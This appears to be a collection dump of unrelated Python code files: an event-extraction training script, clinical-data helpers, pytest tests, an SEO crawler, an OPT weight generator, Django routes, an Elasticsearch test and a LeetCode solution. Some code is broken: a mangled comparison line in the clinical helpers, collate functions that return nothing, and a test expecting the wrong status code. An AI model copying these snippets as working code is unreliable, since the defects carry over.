super(PLMEE_Evaluator, self).__init__()\n self.event_types = event_types\n self.role_types = role_types\n self.f1evaluator = EE_F1Evaluator()\n self.pred_lst, self.gt_lst = [], []\n\n def eval_single(self, predicts: list, gt: SentenceWithEvent, sentence, offset_mapping):\n preds = convert_predicts_to_SentenceWithEvent(predicts, sentence, offset_mapping, self.event_types, self.role_types)\n self.f1evaluator.eval_single(gt, preds)\n self.pred_lst.append({\n 'preds': predicts,\n 'sentence': sentence\n })\n self.gt_lst.append(gt)\n\n\n def eval_step(self) -> Dict[str, Any]:\n result = self.f1evaluator.eval_step()\n self.pred_lst = []\n self.gt_lst = []\n return result\n\n\ndef train_dataset_factory(data_dicts: List[dict], bsz: int = EE_settings.default_bsz, shuffle: bool = EE_settings.default_shuffle, dataset_type: str = 'FewFC'):\n if dataset_type == 'FewFC':\n event_types = EE_settings.event_types_full\n role_types = EE_settings.role_types\n else:\n raise Exception(f'{dataset_type}数据集不存在!')\n train_dataset = SimpleDataset(data_dicts)\n\n\n def collate_fn(lst):\n \"\"\"\n data_dict包含\n - content\n - input_ids\n - token_type_ids\n - attention_mask\n - trigger_gt\n - trigger_start_label\n - trigger_end_label\n - argument_start_label\n - argument_end_label\n - offset_mapping\n\n 模型需要输入:\n :param lst:\n :return:\n \"\"\"\n data_dict = tools.transpose_list_of_dict(lst)\n bsz = len(lst)\n\n # generate basic input\n input_ids = torch.tensor(batch_tool.batchify_ndarray1d(data_dict['input_ids']), dtype=torch.long)\n token_type_ids = torch.tensor(batch_tool.batchify_ndarray1d(data_dict['token_type_ids']), dtype=torch.long)\n attention_mask = torch.tensor(batch_tool.batchify_ndarray1d(data_dict['attention_mask']), dtype=torch.long)\n seq_l = input_ids.shape[1]\n # all (bsz, max_seq_l)\n\n # generate trigger gt\n trigger_gt = data_dict['trigger_gt']\n\n # generate trigger labels\n trigger_start_label_info, trigger_end_label_info = data_dict['trigger_start_label'], data_dict['trigger_end_label']\n trigger_start_label, trigger_end_label = torch.zeros((bsz, seq_l, len(event_types)), dtype=torch.float), torch.zeros((bsz, seq_l, len(event_types)), dtype=torch.float)\n for idx, e_trigger_label in enumerate(trigger_start_label_info):\n for i_etype, i_start in enumerate(e_trigger_label):\n i_cur_type, i_cur_index = i_start\n trigger_start_label[idx][i_cur_index][i_cur_type] = 1\n for idx, e_trigger_label in enumerate(trigger_end_label_info):\n for i_etype, i_end in enumerate(e_trigger_label):\n i_cur_type, i_cur_index = i_end\n trigger_end_label[idx][i_cur_index][i_cur_type] = 1\n\n # generate argument labels\n arg_start_info, arg_end_info = data_dict['argument_start_label'], data_dict['argument_end_label']\n argument_start_label, argument_end_label = torch.zeros((bsz, seq_l, len(role_types)), dtype=torch.float), torch.zeros((bsz, seq_l, len(role_types)), dtype=torch.float)\n for idx, e_arg_label in enumerate(arg_start_info):\n for i_rtype, i_start in enumerate(e_arg_label):\n i_cur_type, i_cur_index = i_start\n argument_start_label[idx][i_cur_index][i_cur_type] = 1\n for idx, e_arg_label in enumerate(arg_end_info):\n for i_rtype, i_end in enumerate(e_arg_label):\n i_cur_type, i_cur_index = i_end\n argument_end_label[idx][i_cur_index][i_cur_type] = 1\n\n return {\n 'input_ids': input_ids,\n 'token_type_ids': token_type_ids,\n 'attention_mask': attention_mask,\n 'trigger_gt': trigger_gt\n }, {\n 'trigger_start_label': trigger_start_label,\n 'trigger_end_label': trigger_end_label,\n 'argument_start_label': 
argument_start_label,\n 'argument_end_label': argument_end_label\n }\n\n train_dataloader = DataLoader(train_dataset, batch_size=bsz, shuffle=shuffle, collate_fn=collate_fn)\n\n return train_dataloader\n\n\ndef dev_dataset_factory(data_dicts: List[dict], dataset_type: str, valid_type: str = 'total'):\n \"\"\"\n\n :param data_dicts:\n :param dataset_type:\n :param valid_type: trigger, argument, total\n :return:\n \"\"\"\n valid_dataset = SimpleDataset(data_dicts)\n\n def trigger_collate_fn(lst):\n data_dict = tools.transpose_list_of_dict(lst)\n bsz = len(lst)\n\n # generate basic input\n input_ids = torch.tensor(batch_tool.batchify_ndarray1d(data_dict['input_ids']), dtype=torch.long)\n token_type_ids = torch.tensor(batch_tool.batchify_ndarray1d(data_dict['token_type_ids']), dtype=torch.long)\n attention_mask = torch.tensor(batch_tool.batchify_ndarray1d(data_dict['attention_mask']), dtype=torch.long)\n\n def arg_collate_fn(lst):\n data_dict = tools.transpose_list_of_dict(lst)\n bsz = len(lst)\n\n # generate basic input\n input_ids = torch.tensor(batch_tool.batchify_ndarray1d(data_dict['input_ids']), dtype=torch.long)\n token_type_ids = torch.tensor(batch_tool.batchify_ndarray1d(data_dict['token_type_ids']), dtype=torch.long)\n attention_mask = torch.tensor(batch_tool.batchify_ndarray1d(data_dict['attention_mask']), dtype=torch.long)\n\n def total_collate_fn(lst):\n data_dict = tools.transpose_list_of_dict(lst)\n bsz = len(lst)\n\n # generate basic input\n input_ids = torch.tensor(batch_tool.batchify_ndarray1d(data_dict['input_ids']), dtype=torch.long)\n token_type_ids = torch.tensor(batch_tool.batchify_ndarray1d(data_dict['token_type_ids']), dtype=torch.long)\n attention_mask = torch.tensor(batch_tool.batchify_ndarray1d(data_dict['attention_mask']), dtype=torch.long)\n\n content = data_dict['content'][0]\n events = data_dict['events'][0]\n offset_mapping = data_dict['offset_mapping'][0]\n sentence_with_event = {\n 'content': content,\n 'events': events,\n 'id': ''\n }\n return {\n 'input_ids': input_ids,\n 'token_type_ids': token_type_ids,\n 'attention_mask': attention_mask\n }, {\n 'gt': sentence_with_event,\n 'sentence': content,\n 'offset_mapping': offset_mapping\n }\n\n if valid_type == 'trigger':\n collate_fn = trigger_collate_fn\n elif valid_type == 'argument':\n collate_fn = arg_collate_fn\n elif valid_type == 'total':\n collate_fn = total_collate_fn\n else:\n raise Exception(f'{valid_type}为错误的评价方法')\n\n valid_dataloader = DataLoader(valid_dataset, batch_size=1, shuffle=False, collate_fn=collate_fn)\n return valid_dataloader\n\n\ndef dataset_factory(train_file: str, valid_file: str, bsz: int = EE_settings.default_bsz, shuffle: bool = EE_settings.default_shuffle, dataset_type: str = 'FewFC'):\n train_data_dicts = pickle.load(open(train_file, 'rb'))\n valid_data_dicts = pickle.load(open(valid_file, 'rb'))\n\n train_dataloader = train_dataset_factory(train_data_dicts, bsz=bsz, shuffle=shuffle, dataset_type=dataset_type)\n valid_dataloader = dev_dataset_factory(valid_data_dicts, dataset_type=dataset_type)\n\n return train_dataloader, valid_dataloader\n\n\n\nmodel_registry = {\n 'model': PLMEE,\n 'loss': PLMEE_Loss,\n 'evaluator': PLMEE_Evaluator,\n 'train_val_data': dataset_factory,\n 'recorder': NaiveRecorder\n}\n\n\nif __name__ == '__main__':\n train_file = 'temp_data/train.FewFC.labeled.pk'\n valid_file = 'temp_data/valid.FewFC.gt.pk'\n bsz = 4\n shuffle = False\n dataset_type = 'FewFC'\n\n train_data_dicts = pickle.load(open(train_file, 'rb'))\n valid_data_dicts = 
pickle.load(open(valid_file, 'rb'))\n\n train_dataloader = train_dataset_factory(train_data_dicts, bsz=bsz, shuffle=shuffle, dataset_type=dataset_type)\n valid_dataloader = dev_dataset_factory(valid_data_dicts, dataset_type=dataset_type)\n\n limit = 5\n train_data, valid_data = [], []\n for idx, (train_sample, valid_sample) in enumerate(list(zip(train_dataloader, valid_dataloader))):\n train_data.append(train_sample)\n valid_data.append(valid_sample)\n\n","repo_name":"1170500820/DLtools","sub_path":"work/EE/PLMEE_rebuild/plmee.py","file_name":"plmee.py","file_ext":"py","file_size_in_byte":22528,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"35507489469","text":"def refining_expGrp(base,keep,rename,dropna_col,index_col=None):\n XpG = pd.read_csv(base+r'/'+base+'_exp_grp.csv',index_col=index_col)\n XpG = XpG[keep]\n XpG = XpG.rename(index=str,columns=rename)\n XpG = XpG.dropna(axis=0,subset=dropna_col)\n return XpG\n\ndef refining_trscr(base,transpose=False):\n Trscr = pd.read_csv(base+r'/'+base+'_data.csv',index_col=0)\n if transpose:\n Trscr = Trscr.transpose()\n return Trscr\n\ndef refining_platform(base,keep,rename,dtype):\n Plt = pd.read_csv(base+r'/'+base+'_platform.csv',dtype=dtype)\n Plt = Plt[Plt['SPOT_ID']!='--Control']\n Plt = Plt[keep]\n Plt = Plt.rename(index=str,columns=rename)\n return Plt\n\ndef barsplot(df,titre='',figsize=(6,4)):\n \n valeurs = df.unique()\n \n categories_sain = []\n categories_malade = []\n \n for v in valeurs:\n \n if pd.isnull(v):\n categories_sain.append(Clinique['id_pathology'].loc[Index_sain].apply(pd.isnull).sum())\n categories_malade.append(Clinique['id_pathology'].loc[Index_malade].apply(pd.isnull).sum())\n else:\n categories_malade.append((df.loc[Index_malade].values == v).sum())\n categories_sain.append((df.loc[Index_sain].values == v).sum())\n\n index = np.arange(valeurs.shape[0])\n \n fig=plt.figure(figsize=figsize)\n \n p1 = plt.bar(index,categories_malade)\n p2 = plt.bar(index,categories_sain,bottom=categories_malade)\n\n plt.ylabel('N')\n plt.title(titre)\n plt.xticks(index,valeurs)\n plt.legend((p2[0],p1[0]),('Sain','Malade'))\n plt.show()\n\ndef OHEncoding(filename,categorical_columns):\n DF = pd.read_csv(filename,index_col=ID)\n DF = pd.get_dummies(DF,columns=categorical_columns)\n return DF\n\ndef Create_Patient_Index_Regression(df):\n return df[DEAD].index.values\n\ndef Create_Patient_Drop_Index_Classification(df,n_mois):\n I = [(k[-1]=='+' and int(k[:-1]) n_mois))\n\ndef Y_clinique(base,index,n_mois=None):\n Y = pd.read_csv(base+r'/'+base+'_clinique_OH.csv',index_col=0)\n Y = Y.loc[index]\n if n_mois is None:\n Y = Y['os_months']\n else:\n Y = Y[OS].apply(get_function_survival(n_mois))\n return Y","repo_name":"Everchange/PredVir","sub_path":"Traitement.py","file_name":"Traitement.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26816376542","text":"import pytest\nimport numpy as np\nimport src.clean_data as cd\n\n# Happy path tests\n@pytest.mark.parametrize(\n \"text,expected\",\n [\n (\"2.50h m\", 2.5), \n (\"10.30h m\", 10.3),\n (\"3h 30m\", 3.5),\n (\"1h 45m\", 1.75),\n ],\n)\ndef test_get_duration_happy_path(text, expected):\n assert cd.get_duration(text) == expected\n\n\n# Unhappy path tests\n@pytest.mark.parametrize(\n \"text\",\n [\n \"2.5\", \n \"10h\", \n \"3h m\", \n \"abcd\",\n \"\",\n ],\n)\ndef test_get_duration_unhappy_path(text):\n with 
pytest.raises(Exception):\n cd.get_duration(text)\n\n\n# Define a common stop dictionary for the tests\n@pytest.fixture\ndef setup_stops():\n # Stop dict\n stop_dict = {\"non-stop\": 0,\n \"1-stop\": 1,\n \"2+-stop\": 2}\n return stop_dict\n\n\n# Happy path tests\n@pytest.mark.parametrize(\n \"text, expected\",\n [\n (\"non-stop\", 0), \n (\"1-stop\", 1),\n (\"2+-stops\", 2),\n (\"3 stops\", np.nan)\n ],\n)\ndef test_get_stops_happy_path(setup_stops, text, expected):\n # Define a common regex pattern for the tests\n pattern = r'non-stop|1-stop|2\+-stop'\n result = cd.get_stops(text, pattern, setup_stops)\n\n if np.isnan(expected):\n assert np.isnan(result)\n else:\n assert result == expected\n\n\n# Unhappy path tests\n@pytest.mark.parametrize(\n \"text\",\n [\n \"stop\", \n \"stops\", \n \"1\", \n \"2\",\n \"\",\n ],\n)\ndef test_get_stops_unhappy_path(setup_stops, text):\n pattern = r'non-stop|1-stop|2\+-stop'\n assert np.isnan(cd.get_stops(text,pattern,setup_stops))\n\n\n# Set hours dictionary\n@pytest.fixture\ndef set_bucketDict(): \n hour_buckets = {\n \"early_morning\": {\"min\": 4, \"max\": 8},\n \"morning\": {\"min\": 6, \"max\": 12}, \n \"afternoon\": {\"min\": 12, \"max\": 16},\n \"evening\": {\"min\": 16, \"max\": 20},\n \"night\": {\"min\": 20, \"max\": 24},\n \"late_night\":{\"min\": 0, \"max\": 4}\n }\n return hour_buckets\n\n# Happy path tests\n@pytest.mark.parametrize(\n \"time, expected\",\n [\n (\"00:00\", \"late_night\"), \n (\"06:20\", \"morning\"),\n (\"12:08\", \"afternoon\"),\n (\"18:43\", \"evening\"),\n (\"04:38\", \"early_morning\"),\n (\"12:00\", \"afternoon\")\n ],\n)\ndef test_bucket_hours_happy_path(set_bucketDict, time, expected):\n assert cd.bucket_hours(time, set_bucketDict) == expected\n\n# Unhappy path tests\n@pytest.mark.parametrize(\n \"time\",\n [\n \"25:00\", \n \"60:00\", \n \"100:00\",\n \"\",\n ],\n)\ndef test_bucket_hours_unhappy_path(set_bucketDict, time):\n # The fixture is injected by pytest through the parameter list; referring to\n # the fixture function directly would pass the function object, not the dict\n with pytest.raises(Exception):\n cd.bucket_hours(time, set_bucketDict)\n","repo_name":"AlejandraLLI/Cloud_Engineering_Project","sub_path":"04_Implementation/pipeline/tests/test_clean_data.py","file_name":"test_clean_data.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"29591531179","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\nimport tldextract as tld\nimport csv\nimport xmltodict\nimport pandas as pd\n\nfrom settings import *\n\n\n'''\nTODO\n- create decorator class to time a function - decorators.py\n- Need to abstract out some functions so that they can take more flexible parameters\n- Add error handling\n\n'''\n\ndef generate_data(name, url):\n '''\n Crawl the given url and save the collected page data to a csv file\n '''\n\n print(\"Starting page crawl...\")\n data = get_all_pages(url)\n\n save_as_file(data)\n \n print(\"File complete.\")\n\n return data\n\ndef save_as_file(data, name=NAME):\n\n # Create file name template\n file_name = name + \"_data.csv\"\n\n keys = ['url'] + list(data[list(data.keys())[0]].keys())\n\n df = pd.DataFrame.from_dict(data, orient='index')\n\n\n # df = df.rename(columns={df.iloc[:,0].name: 'URL'})\n\n df.to_csv(file_name, index=False)\n\ndef get_corpus(data):\n\n corpus = dict()\n\n # Generate corpus of links (do this from local memory, no need to crawl)\n for url in data:\n corpus[url] = data[url]['links_out']\n\n return corpus\n\ndef on_page_data(page):\n \"\"\"\n Crawl a web page and return on page data \n\n Ignores pages set to no-index and no-follow links\n\n - check only
in body\n\n - block resource folders (.*/wp-.*)\n - Check for robots.txt file\n - - Check for redirect chain if r.history > 0\n \"\"\"\n\n # Crawl page\n req = requests.get(page)\n\n # If status is 200\n if req.status_code == 200:\n soup = BeautifulSoup(req.text, \"html.parser\")\n else:\n return None\n\n # Get index status\n index = soup.find(\"meta\", {\"name\":\"robots\"})\n if index == \"no-index\":\n return None\n\n # Get meta data\n title = soup.find(\"title\")\n description = soup.find(\"meta\", {\"name\":\"description\"})\n canonical = soup.find(\"link\", {\"rel\":\"canonical\"})\n og_title = soup.find(\"meta\", {\"property\":\"og:title\"})\n og_description = soup.find(\"meta\", {\"property\":\"og:description\"})\n\n\n # Find interal links only \n num_links = 0 # total\n links = []\n num_links_out = 0 # number of links to interal pages\n external_links = []\n num_ext_out = 0 # number of links to external pages\n for link in soup.find_all('a'):\n num_links += 1\n destination = link.get('href')\n rel = link.get('rel')\n own_domain = tld.extract(page).domain\n\n # Handle none type\n if not destination:\n continue\n\n # Strip anchors and url parameters\n destination = destination.split(\"#\")[0]\n destination = destination.split('?')[0]\n\n # If relative path match\n if re.match('/.*', destination):\n sub_domain = tld.extract(page).subdomain\n if sub_domain:\n destination = 'https://' + sub_domain + own_domain + '.' + tld.extract(page).suffix + destination\n else:\n destination = 'https://' + own_domain + '.' + tld.extract(page).suffix + destination\n\n # If external link\n if tld.extract(destination).domain != own_domain:\n num_ext_out += 1\n external_links.append(destination)\n continue\n\n if re.match(\"mailto:.*\", destination) or re.match(\"tel:.*\", destination):\n continue\n\n # If no-follow link\n if rel == 'no-follow':\n continue\n\n num_links_out += 1\n links.append(destination)\n\n # Get image data\n images = []\n num_images = 0\n missing_alt = 0\n for img in soup.find_all(\"img\"):\n image_url = img.get(\"src\")\n image_alt = img.get(\"alt\")\n\n images.append(image_url)\n num_images += 1\n if not image_alt:\n missing_alt += 1\n\n # Get Schema data\n schema = soup.find(\"script\", {\"type\": \"application/ld+json\"})\n schema = schema.text if schema else None\n\n # Get page headings\n h1 = []\n h2 = []\n h3 = []\n h4 = []\n h5 = []\n h6 = []\n for h_1 in soup.find_all(\"h1\"):\n h1.append(h_1.text)\n for h_2 in soup.find_all(\"h2\"):\n h2.append(h_2.text)\n for h_3 in soup.find_all(\"h3\"):\n h3.append(h_3.text)\n for h_4 in soup.find_all(\"h4\"):\n h4.append(h_4.text)\n for h_5 in soup.find_all(\"h5\"):\n h5.append(h_5.text)\n for h_6 in soup.find_all(\"h6\"):\n h6.append(h_6.text)\n\n # Build info about single page\n page_data = {\n \"url\": page,\n \"links_out\": links,\n \"ext_links_out\": external_links,\n \"meta_title\": str(title.text) if title else None,\n \"meta_description\": str(description[\"content\"]) if description else None,\n \"meta_canonical\": str(canonical[\"href\"]) if canonical else None,\n \"meta_og_title\": str(og_title[\"content\"]) if og_title else None,\n \"meta_og_desc\": str(og_description[\"content\"]) if og_description else None,\n \"images\": images,\n \"missing_alt\": missing_alt,\n 'num_images': num_images,\n \"schema\": schema,\n \"h1\": h1 if h1 else None,\n \"h1_count\": len(h1),\n \"h2\": h2 if h2 else None,\n \"h2_count\": len(h2),\n \"h3\": h3 if h3 else None,\n \"h3_count\": len(h3),\n \"h4\": h4 if h4 else None,\n \"h4_count\": 
len(h4),\n \"h5\": h5 if h5 else None,\n \"h5_count\": len(h5),\n \"h6\": h6 if h6 else None,\n \"h6_count\": len(h6)\n }\n\n return page_data\n\ndef find_keys(d, key):\n '''\n Takes a dictionary and returns all nested values matching a key\n '''\n if isinstance(d, list):\n for i in d:\n for x in find_keys(i, key):\n yield x\n elif isinstance(d, dict):\n if key in d:\n yield d[key]\n for j in d.values():\n for x in find_keys(j, key):\n yield x\n\ndef links_from_sitemap(sitemap, links=None):\n '''\n Returns a set of all pages in a sitemap\n ''' \n # Get XML and save to dict\n resp = requests.get(sitemap)\n sitemap_dict = xmltodict.parse(resp.content)\n\n if not links:\n links = set()\n\n # Find all 'loc' keys in sitemap\n found = set(find_keys(sitemap_dict, 'loc'))\n\n # If the entry is another sitemap, recurse into it; otherwise record the page\n for url in found:\n if re.match(\".*\.xml\", url):\n links = links.union(links_from_sitemap(url))\n else:\n links.add(url)\n return links\n\ndef get_all_pages(url, sitemap=sitemap):\n '''\n Takes a list of links and returns a set of pages \n\n return dict of pages as keys and meta info as dict of values\n '''\n\n pages = set()\n\n # If sitemap start with these links\n if sitemap:\n crawl = links_from_sitemap(sitemap)\n else:\n crawl = set([url])\n\n data = dict()\n while crawl:\n \n # Get a new page to crawl\n page = crawl.pop()\n\n # Record page as page\n pages.add(page)\n\n # Get all internal links on page\n page_info = on_page_data(page)\n\n if not page_info:\n continue\n\n # Add page info to data\n data[page] = page_info\n page_links = page_info['links_out']\n\n # Create a set of links on page\n page_links = set(page_links)\n\n # Get pages that are not already in crawl or pages\n new_pages = page_links.difference(crawl, pages)\n\n # Add new pages to crawl\n crawl = crawl.union(new_pages)\n\n return data\n\ndef update_internal_links(data):\n '''\n Updates internal links to show inbound links\n '''\n \n # Check for other pages linking\n for page_1 in data:\n linked_from = []\n for page_2 in data:\n if page_1 == page_2:\n continue\n if page_1 in data[page_2]['links_out']:\n linked_from.append(page_2)\n \n # Store both the list of linking pages and their count\n data[page_1]['links_in'] = linked_from if linked_from else None\n data[page_1]['num_links_in'] = len(linked_from)\n\n return data\n\ndef check_redirect_chains(data):\n '''\n Takes a dictionary and updates a count for how many redirects are on each page.
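An aside on the redirect check described here: the detection rests entirely on requests' response history, which records every hop of a redirect chain. A minimal standalone sketch (the URL is a placeholder):

import requests

r = requests.get("http://example.com/old-path")  # placeholder; pick a URL that redirects
if r.history:                                    # non-empty iff at least one redirect happened
    chain = [resp.url for resp in r.history] + [r.url]
    print(" -> ".join(chain))                    # full hop-by-hop chain, final URL last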
Writes any redirect chains that are found to a csv file.\n\n ..Opt..\n - clean url of parameters before checking and adding to set\n - Take a page url and a list of links instead\n '''\n\n # Don't check pages that are keys of data\n checked = set(data.keys())\n\n has_redirects = set()\n redirect_chains = set()\n\n # Check all known links\n for page in data:\n count = 0\n\n for url in data[page]['links_out']:\n try:\n # If redirect already found\n if url in has_redirects:\n count += 1\n continue\n elif url in checked:\n continue\n\n r = requests.get(url)\n\n if len(r.history) > 0:\n # Count a redirect\n count += 1\n chain = []\n\n final_url = r.url\n for resp in r.history:\n chain.append(resp.url)\n\n # Add urls already in a chain to checked\n checked.add(resp.url)\n\n if resp.url != final_url:\n has_redirects.add(resp.url)\n\n # Store the chain as a tuple, since lists cannot be put in a set\n redirect_chains.add(tuple(chain))\n\n except requests.ConnectionError:\n print(\"Error: failed to connect.\")\n \n # Save number of links\n data[page][\"redirect_links\"] = count\n\n # Save redirect chains to csv file, one chain per row\n with open(NAME + \"_chains.csv\", 'w') as f:\n writer = csv.writer(f)\n writer.writerows(redirect_chains)\n\n return data\n\nif __name__ == '__main__':\n generate_data(NAME, URL)","repo_name":"arah44/seo-scraper","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":9709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34640499858","text":"import argparse\nimport json\nimport os\nimport torch\nfrom transformers.models.opt import OPTConfig\nfrom transformers_neuronx.module import sanitize_file_name, _KEY_TO_FILENAME_JSON\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('name', help=\"OPT model name or path to config.json\")\n parser.add_argument('save', help=\"target folder to save the model\")\n parser.add_argument('--empty', action='store_true')\n args = parser.parse_args()\n gen_random_pretrained(args.name, args.save, args.empty)\n\n\ndef gen_random_pretrained(model_name, save, empty=False):\n if 'json' in model_name:\n config = json.load(open(model_name))\n elif model_name == 'facebook/opt-175b':\n config = opt_175b_config()\n else:\n config = OPTConfig.from_pretrained(model_name).to_dict()\n os.makedirs(save, exist_ok=True)\n with open(os.path.join(save, 'config.json'), 'w') as fp:\n json.dump(config, fp, indent=2)\n vocab_size = config['vocab_size']\n hidden_size = config['hidden_size']\n max_position_embeddings = config['max_position_embeddings']\n ffn_dim = config['ffn_dim']\n num_hidden_layers = config['num_hidden_layers']\n init_std = config['init_std']\n torch_dtype = config['torch_dtype']\n name2shape = {\n 'model.decoder.embed_tokens.weight': [vocab_size, hidden_size],\n 'model.decoder.embed_positions.weight': [max_position_embeddings + 2, hidden_size],\n 'model.decoder.final_layer_norm.weight': [hidden_size],\n 'model.decoder.final_layer_norm.bias': [hidden_size],\n }\n layer_name2shape = {\n 'self_attn.k_proj.weight': [hidden_size, hidden_size],\n 'self_attn.k_proj.bias': [hidden_size],\n 'self_attn.v_proj.weight': [hidden_size, hidden_size],\n 'self_attn.v_proj.bias': [hidden_size],\n 'self_attn.q_proj.weight': [hidden_size, hidden_size],\n 'self_attn.q_proj.bias': [hidden_size],\n 'self_attn.out_proj.weight': [hidden_size, hidden_size],\n 'self_attn.out_proj.bias': [hidden_size],\n 'self_attn_layer_norm.weight': [hidden_size],\n 'self_attn_layer_norm.bias': [hidden_size],\n 'fc1.weight':
[ffn_dim, hidden_size],\n 'fc1.bias': [ffn_dim],\n 'fc2.weight': [hidden_size, ffn_dim],\n 'fc2.bias': [hidden_size],\n 'final_layer_norm.weight': [hidden_size],\n 'final_layer_norm.bias': [hidden_size],\n }\n for idx in range(num_hidden_layers):\n for name, shape in layer_name2shape.items():\n name2shape[f'model.decoder.layers.{idx}.{name}'] = shape\n name2shape['lm_head.weight'] = [vocab_size, hidden_size]\n key_to_filename = {}\n for idx, key in enumerate(name2shape.keys()):\n key_to_filename[key] = f'p{idx}.{sanitize_file_name(key)}'\n if empty:\n key_to_filename[key] = f'{key_to_filename[key]}.empty_json'\n split_param_dir = os.path.join(save, 'pytorch_model.bin')\n os.makedirs(split_param_dir, exist_ok=True)\n with open(os.path.join(split_param_dir, _KEY_TO_FILENAME_JSON), 'w') as fp:\n json.dump(key_to_filename, fp, indent=2)\n dtype = getattr(torch, torch_dtype)\n for name, shape in name2shape.items():\n save_path = os.path.join(split_param_dir, key_to_filename[name])\n factor = 0.0 if 'layer_norm' in name or 'bias' in name else init_std\n if empty:\n empty_json = {\n 'torch_dtype': torch_dtype,\n 'shape': shape,\n 'init_std': factor,\n }\n with open(save_path, 'w') as fp:\n json.dump(empty_json, fp, indent=2)\n continue\n init_param = factor * torch.randn(shape)\n init_param = init_param.to(dtype)\n torch.save(init_param, save_path)\n print(f'done saving {save_path}')\n\n\ndef opt_175b_config():\n vocab_size = 50272\n hidden_size = 12288\n max_position_embeddings = 2048\n ffn_dim = 49152\n num_hidden_layers = 96\n init_std = 0.02\n config = dict(\n _name_or_path='facebook/opt-175b',\n _remove_final_layer_norm=False,\n activation_dropout=0.0,\n activation_function='relu',\n architectures=['OPTForCausalLM'],\n attention_dropout=0.0,\n bos_token_id=2,\n do_layer_norm_before=True,\n dropout=0.1,\n eos_token_id=2,\n ffn_dim=ffn_dim,\n hidden_size=hidden_size,\n init_std=init_std,\n layerdrop=0.0,\n max_position_embeddings=max_position_embeddings,\n model_type='opt',\n num_attention_heads=96,\n num_hidden_layers=num_hidden_layers,\n output_projection=True,\n pad_token_id=1,\n prefix='',\n torch_dtype='float16',\n transformers_version='4.23.1',\n use_cache=True,\n vocab_size=vocab_size,\n word_embed_proj_dim=hidden_size,\n )\n return config\n","repo_name":"aws-neuron/transformers-neuronx","sub_path":"src/transformers_neuronx/opt/gen_random_pretrained.py","file_name":"gen_random_pretrained.py","file_ext":"py","file_size_in_byte":4861,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"3"} +{"seq_id":"9239830535","text":"\"\"\"Blog URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\n# from django.contrib import admin\nfrom django.urls import path, re_path\nfrom web.views import account\nfrom web.views import home\nurlpatterns = [\n path('register.html', account.register),\n path('check_code.html', account.check_code),\n path('login.html', account.login),\n path('logout.html', account.logout),\n re_path('(?P<site>\w+)/(?P<nid>\d+).html', home.detail),\n re_path('(?P<site>\w+).html', home.home),\n re_path('(?P<site>\w+)/(?P<condition>((tag)|(date)|(category)))/(?P<val>\w+-*\w*).html', home.filter),\n re_path('all/(?P<page>\d+).html', home.index, name='index'),\n\n path('', home.index),\n]\n","repo_name":"44aced/blog","sub_path":"web/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17091967360","text":"\"\"\"\nThis works as a smoke test for elasticsearch tests and, at the same\ntime, as a template for making more tests\n\"\"\"\nimport requests\nfrom conftest import ES_TOKEN\n\n\ndef description():\n return \"\"\"\nAdd one single document\n\nUsing the Single document APIs, add one document into the test-index of document type _doc, with the following content:\n\n{\n \"@timestamp\": \"1969-07-20T20:17:00.000Z\",\n \"event\": {\n \"original\": \"Apollo 11 - Moon landing\"\n }\n}
\n\"\"\"\n\n\ndef test_if_server_is_alive():\n print(f\"Token: {ES_TOKEN}\")\n try:\n r = requests.get(\n \"https://localhost:9200/_search\",\n headers={\n \"Content-Type\": \"application/json\",\n \"Authorization\": f\"Basic {ES_TOKEN}\",\n },\n verify=\"./certs/ca/ca.crt\",\n )\n status = r.status_code\n except:\n status = 404\n\n assert status == 201\n","repo_name":"ferro2o3/es-testing","sub_path":"tests/001-getting-started/0001_add_single_document.py","file_name":"0001_add_single_document.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8472782338","text":"class Solution:\n def singleNumber(self, nums: List[int]) -> int:\n # answer = 0\n # for num in nums:\n # #All the numbers that have a pair will zero out!!!\n # answer ^= num #Awesome idea!!! \n # return answer\n set_num = set()\n for num in nums:\n if num in set_num:\n set_num.remove(num)\n else:\n set_num.add(num)\n return set_num.pop()\n ","repo_name":"robertomaldonado/LeetHubCode","sub_path":"136-single-number/136-single-number.py","file_name":"136-single-number.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7637580455","text":"from keras.applications import VGG19\nimport keras\n\nimport config\n\ndef buildVGG():\n \"\"\"Build and return the vgg network for feature extraction.\"\"\"\n vgg19 = VGG19(\n include_top=False,\n weights='imagenet',\n input_shape=config.IMG_SHAPE\n )\n vgg19.trainable = False\n for layer in vgg19.layers:\n layer.trainable = False\n\n feature_extractor = keras.models.Model(\n inputs=vgg19.input,\n outputs=vgg19.get_layer(\"block2_conv2\").output\n )\n\n feature_extractor.trainable = False\n return feature_extractor\n\n\ndef buildGenerator(kernel_size, layers, bn, kpcn, kpcn_size):\n \"\"\"Build and return the generator for use in the gan.\"\"\"\n def convLayer(c_input, num_filters):\n \"\"\"Helper function for a convolutional block.\"\"\"\n c_output = keras.layers.Conv2D(\n filters=num_filters,\n kernel_size=kernel_size,\n use_bias=False,\n strides=[1, 1],\n padding=\"SAME\",\n kernel_initializer=keras.initializers.glorot_normal(seed=5678)\n 